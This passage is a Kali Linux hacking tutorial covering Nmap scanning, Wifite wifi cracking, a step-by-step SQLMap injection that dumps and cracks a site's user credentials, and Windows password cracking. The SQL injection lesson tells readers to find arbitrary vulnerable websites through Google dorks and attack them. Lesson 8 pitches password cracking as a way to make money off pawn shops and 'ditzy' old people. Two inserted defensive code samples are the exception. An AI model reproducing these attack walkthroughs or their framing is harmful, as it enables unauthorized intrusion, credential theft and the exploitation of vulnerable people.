deb-src http://deb.torproject.org/torproject.org wheezy main
deb-src http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main

You also need to install the packages necessary to build your own debs and the packages needed to build Tor:

apt-get install build-essential fakeroot devscripts
apt-get build-dep tor

Then you can build Tor in ~/debian-packages:

mkdir ~/debian-packages; cd ~/debian-packages
apt-get source tor
cd tor-*
debuild -rfakeroot -uc -us
cd ..

Now you can install the new package:

dpkg -i tor_*.deb

Step 2: Downloading and running the Tor Browser Bundle

Download the Tor Browser Bundle from here: https://www.torproject.org/projects/torbrowser.html.en

Download the architecture-appropriate file, save it somewhere, then run one of the following two commands to extract the package archive:

tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz

or (for the 64-bit version):

tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz

(where LANG is the language listed in the filename).
Once that's done, switch to the Tor Browser directory by running:

cd tor-browser_LANG

(where LANG is the language listed in the filename). To run the Tor Browser Bundle, execute the start-tor-browser script:

./start-tor-browser

This will launch Vidalia and, once that connects to Tor, it will launch Firefox.

Note: Do not unpack or run TBB as root (though in Kali Linux it doesn't make any difference).

Lesson 5: Introduction to Nmap

Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration; its GUI is user friendly and it boasts a wide variety of features. Nmap ("Network Mapper") is a free and open source utility for network exploration and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL) and copyright.

Nmap Overview and Demonstration

Sometimes the best way to understand something is to see it in action.
This section includes examples of Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand everything at once. This is simply a broad overview of features that are described in depth in later chapters. The "solutions" included throughout this book demonstrate many other common Nmap tasks for security auditors and network administrators.

Avatar Online

Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small San Francisco penetration-testing firm he works for has been quiet lately due to the impending holidays. Felix spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and fascination since a childhood spent learning everything he could about networking, security, Unix, and phone systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to announce that the sales department had closed a pen-testing deal with the Avatar Online gaming company.

Avatar Online (AO) is a small company working to create the next generation of massively multi-player online role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neal Stephenson's Snow Crash, is fascinating but still highly confidential.
After witnessing the high-profile leak of Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities found.

The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what IP address ranges the target is using, what hosts are available, what services those hosts are offering, general network topology details, and what firewall/filtering policies are in effect. Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem.

Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless -n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix is doing this for another reason—to double-check that the IP ranges are correct. The systems administrator who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster.
The contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but it will not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of the results are shown in Example 1.1:

felix> nmap -sL 6.209.24.0/24 6.207.0.0/22
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3
Nmap scan report for 6.209.24.4
...
Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21)
Nmap scan report for dhcp-22.corp.avataronline.com (6.209.24.22)
Nmap scan report for dhcp-23.corp.avataronline.com (6.209.24.23)
...
Nmap scan report for 6.207.0.0
Nmap scan report for gw.avataronline.com (6.207.0.1)
Nmap scan report for ns1.avataronline.com (6.207.0.2)
Nmap scan report for ns2.avataronline.com (6.207.0.3)
Nmap scan report for ftp.avataronline.com (6.207.0.4)
Nmap scan report for 6.207.0.5
Nmap scan report for 6.207.0.6
Nmap scan report for www.avataronline.com (6.207.0.7)
Nmap scan report for 6.207.0.8
...
Nmap scan report for cluster-c120.avataronline.com (6.207.2.120)
Nmap scan report for cluster-c121.avataronline.com (6.207.2.121)
Nmap scan report for cluster-c122.avataronline.com (6.207.2.122)
...
Nmap scan report for 6.207.3.255
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
felix>

Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online. No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive and try a port scan. He uses Nmap features that try to determine the application and version number of each service listening on the network.
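The scope check Felix performs by eye on the list-scan output, as an added example that is not part of the original text: it parses the "Nmap scan report for" lines, confirms that the agreed CIDR targets expand to the 1,280 addresses nmap reports, and flags any reverse-DNS name that does not belong to the client's domain. The sample output is constructed from the excerpt above, with one unrelated hostname added so that a mismatch gets flagged.

```python
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample modelled on the excerpt in the lesson (fictional AO ranges
# and hostnames). The vpn.unrelated-business.example line was added on purpose
# so that a hostname outside the client's domain gets flagged. Not real output.
SAMPLE_LIST_SCAN = """\
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3
Nmap scan report for vpn.unrelated-business.example (6.209.24.9)
Nmap scan report for gw.avataronline.com (6.207.0.1)
Nmap scan report for ns1.avataronline.com (6.207.0.2)
Nmap scan report for www.avataronline.com (6.207.0.7)
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
"""

# The two netblocks Avatar Online put in scope in the story.
TARGETS = ["6.209.24.0/24", "6.207.0.0/22"]
CLIENT_DOMAIN = "avataronline.com"

# "Nmap scan report for name (ip)" when reverse DNS resolved, else "... for ip".
REPORT_RE = re.compile(
    r"^Nmap scan report for "
    r"(?:(?P<name>\S+) \((?P<ip_named>[^)]+)\)|(?P<ip_bare>\S+))$"
)
DONE_RE = re.compile(r"^Nmap done: (?P<count>\d+) IP address")


def parse_list_scan(text: str) -> List[Tuple[str, Optional[str]]]:
    """Return (ip, hostname or None) for every 'Nmap scan report for' line."""
    entries: List[Tuple[str, Optional[str]]] = []
    for line in text.splitlines():
        m = REPORT_RE.match(line.strip())
        if not m:
            continue
        if m.group("ip_named"):
            entries.append((m.group("ip_named"), m.group("name")))
        else:
            entries.append((m.group("ip_bare"), None))
    return entries


def scanned_count(text: str) -> Optional[int]:
    """Address count nmap itself reports on its 'Nmap done' line."""
    for line in text.splitlines():
        m = DONE_RE.match(line.strip())
        if m:
            return int(m.group("count"))
    return None


def expected_address_count(targets: List[str]) -> int:
    """How many addresses the CIDR targets expand to (Felix's 1,280)."""
    return sum(ipaddress.ip_network(t, strict=False).num_addresses for t in targets)


def check_scope(entries, targets: List[str], client_domain: str) -> Dict[str, list]:
    """Flag addresses outside the agreed netblocks and reverse-DNS names that
    do not belong to the client's domain: hints that the range list may be
    wrong and that a real scan would touch someone else's systems."""
    nets = [ipaddress.ip_network(t, strict=False) for t in targets]
    domain = client_domain.lower()
    out_of_range: List[str] = []
    foreign_names: List[Tuple[str, str]] = []
    for ip, name in entries:
        addr = ipaddress.ip_address(ip)
        if not any(addr in net for net in nets):
            out_of_range.append(ip)
        if name is not None:
            host = name.lower().rstrip(".")
            if host != domain and not host.endswith("." + domain):
                foreign_names.append((ip, name))
    return {"out_of_range": out_of_range, "foreign_names": foreign_names}


if __name__ == "__main__":
    found = parse_list_scan(SAMPLE_LIST_SCAN)
    print("expected addresses:", expected_address_count(TARGETS),
          "reported by nmap:", scanned_count(SAMPLE_LIST_SCAN))
    print(check_scope(found, TARGETS, CLIENT_DOMAIN))
```

Any entry in foreign_names is a reason to go back to the client before running the intrusive scan, which is exactly the mistake the list scan is meant to catch.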
He also requests that Nmap try to guess the remote operating system via a series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans. After a bit of consideration, Felix settles on the following command:

nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan-%D 6.209.24.0/24 6.207.0.0/22

Intro

Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

1. How to open nmap
   A. GUI method: Application → Kali Linux → Information gathering → DNS Analysis → nmap
   B. Open a terminal, type nmap and hit enter

2. Scan a single IP address (works whether the firewall on the target PC is off or on)
   Syntax: nmap IP address/hostname
   Ex: nmap 192.168.75.131
   Ex: nmap google.com

3. Boost up your nmap scan: using this option you can decrease scan time
   Syntax: nmap -F IP address
   Ex: nmap -F google.com

4. Scan multiple IP addresses or a subnet
   A. Scan a range of IP addresses
      Syntax: nmap IP address range
      Ex: nmap 192.168.75.1-131
   B. Scan a range of IP addresses using a wildcard
      Ex: nmap 192.168.75.*
   C. Scan an entire subnet
      Ex: nmap 192.168.75.1/24

5. Turn on OS and version detection
   Ex: nmap -O 192.168.75.131

6. Scan all TCP ports on the target IP
   Ex: nmap -sT 192.168.75.131

7. Scan a firewall for security weaknesses
   A. Null scan: TCP Null scan to fool a firewall into generating a response
      Ex: nmap -sN 192.168.75.131
   B. FIN scan: TCP FIN scan to check a firewall
      Ex: nmap -sF 192.168.75.131
   C. Xmas scan: TCP Xmas scan to check a firewall
      Ex: nmap -sX 192.168.75.131

8. UDP scan: scan a host for UDP services. This scan is used to view open UDP ports.
   Ex: nmap -sU 192.168.75.131

9. Scan for IP protocols: this type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.
   Ex: nmap -sO 192.168.75.131

10. Detect remote service (server/daemon) version numbers
    Ex: nmap -sV 192.168.75.131

11. Find out the most commonly used TCP ports
    A. TCP SYN scan (stealthy scan)
       Ex: nmap -sS 192.168.75.131
    B. TCP connect scan
       Ex: nmap -sT 192.168.75.131
    C. TCP ACK scan
       Ex: nmap -sA 192.168.75.131
    D. TCP Window scan
       Ex: nmap -sW 192.168.75.131
    E. TCP Maimon scan
       Ex: nmap -sM 192.168.75.131

12. List scan: this command is used to list the targets to scan
    Ex: nmap -sL 192.168.75.131

13. Host discovery or ping scan: scan a network and find out which servers and devices are up and running
    Ex: nmap -sP 192.168.75.0/24

14. Scan a host when it is protected by a firewall
    Ex: nmap -PN 192.168.75.1

Lesson 6: Wifi Hacking the Easy Way: Using Wifite

Wifite

While the aircrack-ng suite is a well known name in wireless hacking, the same can't be said about Wifite. Living in the shade of the greatness of the established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (e.g. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot.
I'm listing some features before I tell you how to use Wifite (which I don't think is necessary at all, as anyone who can understand the simple English instructions given by Wifite can use it on his own).

Features of Wifite

- Sorts targets by signal strength (in dB); cracks closest access points first
- Automatically de-authenticates clients of hidden networks to reveal SSIDs
- Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
- Customizable settings (timeouts, packets/sec, etc)
- "Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
- All captured WPA handshakes are backed up to wifite.py's current directory
- Smart WPA de-authentication; cycles between all clients and broadcast deauths
- Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
- Displays session summary at exit; shows any cracked keys
- All passwords saved to cracked.txt
- Built-in updater: ./wifite.py -upgrade

I find it worth mentioning here that not only does it hack wifi the easy way, it also hacks in the best possible way. For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP method to speed up data packets.

Hacking a WEP network

wifite -wep

You might even have used the command

wifite

The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing Ctrl+C. It'll then ask you which wifi to hack. In my case, I didn't specify -wep, so it shows all the wifis in range. You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can expect it to hack the wifi in 10 mins approx.
Notice how it automatically did the fake auth and ARP replay. Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you; you can stick with the simple wifite. Also, specifying the channel is optional, so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag).

Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following:

wifite -help

This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks:

WEP
    -wep         only target WEP networks [off]
    -pps <num>   set the number of packets per second to inject [600]
    -wept <sec>  sec to wait for each attack, 0 implies endless [600]
    -chopchop    use chopchop attack [on]
    -arpreplay   use arpreplay attack [on]
    -fragment    use fragmentation attack [on]
    -caffelatte  use caffe-latte attack [on]
    -p0841       use -p0841 attack [on]
    -hirte       use hirte (cfrag) attack [on]
    -nofakeauth  stop attack if fake authentication fails [off]
    -wepca <n>   start cracking when number of ivs surpass n [10000]
    -wepsave     save a copy of .cap files to this directory [off]

Troubleshooting

Wifite quits unexpectedly, stating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting."

You are most probably using Kali inside a virtual machine. A virtual machine does not support the host's internal wireless card. Either buy an external wireless card, or do a live boot / dual boot alongside Windows; in general, anything other than a virtual machine.
Lesson 7: SQL Injection using SQLMap

Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its employees from any legal liability for your actions.

SQL injection is a way of extracting user login info and other data from unsecured SQL databases on companies' servers. It is one of the most common ways sites are hacked.

What is SQLMAP?

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables.
  This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
- Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
- Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

[Source: www.sqlmap.org]

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any of the other steps. Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find vulnerable SQLMAP SQL injectable websites

You can google a list of google dork strings.

Step 1.b: Initial check to confirm if a website is vulnerable to SQLMAP SQL Injection

For every google dork string, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue which one is best, but to me the following is the simplest and most conclusive. Let's say you searched using this string inurl:item_id= and one of the search results shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single quotation mark ' at the end of the URL.
(Just to be sure: " is a double quotation mark and ' is a single quotation mark.) So now your URL will become like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to a different page, move on to the next site in your Google search results page. See the example error below in the screenshot. I've obscured everything including URL and page design for obvious reasons.

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in '/' Application.
Unclosed quotation mark before the character string 'attack;'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attack;'.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended
    at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180)
    at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near "'''"

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I've found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases on that vulnerable database server (this is also called enumerating the number of columns).
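The reason the quote test in Step 1.b produces those errors is that the application pastes the item_id value straight into its SQL text. As an added example that is not part of the original tutorial, the vulnerable pattern is shown next to its hardened form, using an in-memory SQLite table constructed here to stand in for the item table behind item.cgi.

```python
import sqlite3
from typing import Callable, Optional, Tuple

Row = Optional[Tuple[int, str]]


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the item table behind item.cgi."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO item VALUES (?, ?)",
                     [(15, "fifteenth item"), (16, "sixteenth item")])
    return conn


def lookup_item_vulnerable(conn: sqlite3.Connection, item_id: str) -> Row:
    """The flawed pattern: the raw query-string value is pasted into the SQL.
    item_id=15' leaves the string literal unterminated, so the database raises
    a syntax error, which is exactly the signal the quote test looks for."""
    sql = "SELECT item_id, title FROM item WHERE item_id = '" + item_id + "'"
    return conn.execute(sql).fetchone()


def lookup_item_safe(conn: sqlite3.Connection, item_id: str) -> Row:
    """Hardened form: validate the expected type, then bind the value as a
    parameter so it can never be parsed as SQL. A bad value yields an empty
    result, not a database error message for the visitor to read."""
    if not item_id.isdigit():
        return None
    return conn.execute(
        "SELECT item_id, title FROM item WHERE item_id = ?", (int(item_id),)
    ).fetchone()


def probe_behaviour(lookup: Callable[[sqlite3.Connection, str], Row],
                    item_id: str) -> str:
    """What a visitor sees for a given item_id: 'row', 'empty' or 'sql_error'."""
    conn = make_demo_db()
    try:
        row = lookup(conn, item_id)
    except sqlite3.Error:
        return "sql_error"
    finally:
        conn.close()
    return "row" if row else "empty"


if __name__ == "__main__":
    for value in ("15", "15'"):
        print(f"item_id={value!r}: vulnerable -> "
              f"{probe_behaviour(lookup_item_vulnerable, value)}, "
              f"safe -> {probe_behaviour(lookup_item_safe, value)}")
```

The hardened handler never reaches the database with the trailing quote, so there is no syntax error to leak and nothing for the rest of this tutorial's steps to work with.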
As I am using SQLMAP, it will also tell me which one is vulnerable. Run the following command against your vulnerable website:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:

- sqlmap = name of the sqlmap binary file
- -u = target URL (e.g. "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15")
- --dbs = enumerate DBMS databases

This command reveals quite a bit of interesting information:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, we now have two databases that we can look into. information_schema is a standard database on almost every MySQL server, so our interest would be in the sqldummywebsite database.

Step 3: List tables of the target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database has and what their names are. To find out that information, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database has 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

And of course we want to check what's inside the user_info table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.
Step 4: List columns of the target table of the selected database using SQLMAP SQL Injection

Now we need to list all the columns of the target table user_info of the sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy; run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from the target table user_info of the sqldummywebsite database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for: the target columns user_login and user_password.

Step 5: List usernames from the target columns of the target table of the selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes it easy! Just run the following command again:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there; we now only need the password for this user. The next step shows just that.

Step 6: Extract the password from the target columns of the target table of the selected database using SQLMAP SQL Injection

You're probably getting used to how the SQLMAP SQL Injection tool works by now. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have the password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

But hang on, this password looks funny. This can't be someone's password. Someone who leaves their website vulnerable like that just can't have a password like that. That is exactly right: this is a hashed password. That means the password is encrypted, and now we need to decrypt it.

Step 7: Cracking the password

So the hashed password is 24iYBc17xK0e. How do you know what type of hash that is?

Step 7.a: Identify the hash type

Luckily, Kali Linux provides a nice tool that we can use to identify which type of hash this is. On the command line, type the following command and paste the hash value at the prompt:

hash-identifier

Excellent. So this is a DES(Unix) hash.

Step 7.b: Crack the hash using cudahashcat

First of all I need to know which hash mode code to use for DES hashes. So let's check that:

cudahashcat --help | grep DES

So it's either 1500 or 3100. But it was a MySQL database, so it must be 1500.

I am running a computer that has an NVIDIA graphics card, so I will be using cudaHashcat. On my laptop I have an AMD ATI graphics card, so there I will be using oclHashcat. If you're on VirtualBox or VMware, neither cudahashcat nor oclhashcat will work; you must install Kali on either a persistent USB or a hard disk. Instructions are on the website; search around.

I saved the hash value 24iYBc17xK0e. in a file named DES.hash. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: the usual Hashcat was unable to determine the code for DES hashes
(it is not in its help menu). However, both cudaHashcat and oclHashcat found and cracked the key. Anyhow, here's the cracked password: abc123.

24iYBc17xK0e.:abc123

Sweet, we now even have the password for this user.

Lesson 8: Cracking Windows Passwords in Kali Linux

This is probably your number one money maker: pawn shops whose forfeited computers need to be sold, and citizens and old people who are just ditzy. Enjoy.

Crack and reset the system password locally using Kali

Insert the USB or Live CD and boot your PC. Make sure "Boot from USB" is the first option in the boot menu in the BIOS. Boot the Windows machine with the Live CD. On the Kali Linux boot menu, select Live (forensic mode). Kali Linux initializes; when it has loaded, open a terminal window and navigate to the Windows password database file.

Crack the Windows password with ophcrack:

After the live Kali Linux has loaded, go to the system menu > ophcrack and click OK. Ophcrack uses rainbow tables to crack NTLM and LM hashes into plain text; it's a free Windows password cracker based on rainbow tables, and a very efficient implementation of rainbow tables done by the inventors of the method. If you have a complex password it will take a lot longer than a simple password, and with the free tables your password may never be cracked. Once the crack is done you will see the password in plain text; write it down and reboot the machine to log in. If your password isn't cracked, you can also log in as one of the other users with admin rights and then change your password from within Windows. With the free tables available you will not be able to crack every password, but the paid tables range from $100 to $1000. Windows uses NTLM hashes to encrypt the password file, which gets stored in the SAM file. We simply need to target this file to retrieve the password. Now you can see the ophcrack application window.
Here, click on Load > Encrypted SAM. After that we need to give the path to the SAM directory, which by default is /mnt/hda1/WINDOWS/System32; click Choose. Here we can see the saved hashes with the username and user ID. Now click on the Crack button and wait for the password. It's quick and easy. That's it; it'll show the password if you are successful with the free tables.

I downloaded the XP free small and the Vista free tables. Once you have downloaded the tables you will need to unzip them into separate folders. I made a folder called "hash-tables" and then made 2 more folders within it, one for each table to unzip into. Run the program and click on the "Tables" button. Select the table you downloaded and click "Install", navigate to the folder where you unzipped the table, select it and then click "OK". You should see green lights next to the tables you installed.

Reset the Windows password with chntpw:

Navigate to the Windows password database file. In almost all versions of Windows the passwords are saved in the SAM file. This file is usually located under /Windows/System32/config. On your system it may look something like this: /media/hda1/Windows/System32/config. The SAM database is usually in /media/name_of_hard_drive/Windows/System32/config.

Type the command chntpw -l SAM and it will list all the usernames contained on the Windows system.

#chntpw -l SAM

The command gives us a list of usernames on the system. Once we have the username we want to modify, we simply run the command chntpw -u "username" SAM. In the example below we typed:

#chntpw -u "Sanjai sathish" SAM

and we get the following menu. We now have the option of clearing the password, changing the password, or promoting the user to administrator. Changing the password does not always work on Windows 7/8 systems; it may work on XP systems, so it is recommended to clear the password instead. Then you will be able to log in with a blank password.
You can also promote the user to a local administrator.

Crack the password on Linux using John the Ripper:

John the Ripper is a fast password cracker; its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, Windows LM hashes are supported out of the box, plus lots of other hashes and ciphers in the community-enhanced version.

John the Ripper is a popular dictionary-based password cracking tool. It uses a wordlist full of passwords and then tries to crack a given password hash using each password from the wordlist. In other words, this is brute-force password cracking, the most basic form of password cracking. It is also the most time- and CPU-consuming technique: the more passwords there are to try, the more time is required. But still, if you want to crack a password locally on your system, then john is one of the good tools to try. John is among the top 10 security tools in Kali Linux.

In this topic I am going to show you how to use the unshadow command along with john to crack the passwords of users on a Linux system. On Linux the username/password details are stored in the following 2 files:

#/etc/passwd
#/etc/shadow

